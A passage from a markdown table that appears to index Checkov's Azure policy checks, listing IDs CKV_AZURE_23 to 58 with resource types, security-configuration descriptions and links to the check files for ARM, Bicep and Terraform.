[SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1609 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1610 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1611 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1612 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1613 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | -| 1614 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | -| 1615 | CKV_AZURE_24 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | -| 1616 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1617 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1618 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1619 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | arm | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 1620 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 1621 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) | -| 1622 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 1623 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 1624 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) | -| 1625 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 1626 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 1627 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) | -| 1628 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 1629 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 1630 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) | -| 1631 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 1632 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 1633 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) | -| 1634 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1635 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1636 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1637 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1638 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1639 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1640 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1641 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) | -| 1642 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1643 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1644 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1645 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1646 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1647 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1648 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1649 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 1650 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 1651 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) | -| 1652 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1653 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1654 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) | -| 1655 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1656 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1657 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1658 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1659 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | -| 1660 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1661 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1662 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1663 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | -| 1664 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1665 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1666 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1667 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 1668 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 1669 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) | -| 1670 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 1671 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 1672 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) | -| 1673 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 1674 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 1675 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) | -| 1676 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 1677 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 1678 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) | -| 1679 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 1680 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 1681 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) | -| 1682 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 1683 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 1684 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) | -| 1685 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) | -| 1686 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 1687 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 1688 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) | -| 1689 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) | -| 1690 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | -| 1691 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | -| 1692 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) | -| 1693 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) | -| 1694 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | -| 1695 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | -| 1696 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) | -| 1697 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | -| 1698 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | -| 1699 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | -| 1700 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | -| 1701 | CKV_AZURE_52 | resource | azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) | -| 1702 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) | -| 1703 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) | -| 1704 | CKV_AZURE_55 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) | -| 1705 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) | -| 1706 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1707 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1708 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | -| 1709 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | 